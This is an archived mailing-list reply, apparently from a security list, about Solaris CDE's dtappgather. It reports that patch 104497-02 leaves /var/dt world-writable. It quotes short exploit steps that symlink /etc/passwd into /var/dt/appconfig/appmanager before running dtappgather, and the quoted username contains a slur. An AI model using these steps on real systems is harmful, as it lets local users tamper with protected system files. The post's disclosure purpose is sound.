Re: /usr/dt/bin/dtappgather exploit

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Steven Goldberg - SE - Seattle WA: "Re: /usr/dt/bin/dtappgather exploit"
• Previous message: kevingeo@CRUZIO.COM: "Quake 2 Linux 3.13 - ref_root.so still works"
• Maybe in reply to: Mastoras: "/usr/dt/bin/dtappgather exploit"
• Next in thread: Steven Goldberg - SE - Seattle WA: "Re: /usr/dt/bin/dtappgather exploit"

I'm afraid that's not enough: it fixes the DTUSERSESSION
bug; but it doesn't fixes directory permisions.

In a Solaris 2.5 sparc box, with patch 104497-02
you have:

drwxrwxrwx 4 root root 1536 Feb 25 19:46 /var/dt
drwxrwxrwx 3 bin bin 512 Jan 20 1997 /var/dt/appconfig
drwxr-xr-x 4 elias robot 512 Oct 6 14:42 /var/dt/tmp
^^^^^ this is a normal non-admin account; sometimes
the CDE login sessions changes it.

so, it's still vulnerable to the link exploit

(but yes, this is not a problem in 2.6, I don't know about 2.5.1)

> > > nigg0r@host% ls -l /etc/passwd
> > > -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd
> > > nigg0r@host% ln -s /etc/passwd
> /var/dt/appconfig/appmanager/generic-display-0
> > > nigg0r@host% dtappgather

--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

• Next message: Steven Goldberg - SE - Seattle WA: "Re: /usr/dt/bin/dtappgather exploit"
• Previous message: kevingeo@CRUZIO.COM: "Quake 2 Linux 3.13 - ref_root.so still works"
• Maybe in reply to: Mastoras: "/usr/dt/bin/dtappgather exploit"
• Next in thread: Steven Goldberg - SE - Seattle WA: "Re: /usr/dt/bin/dtappgather exploit"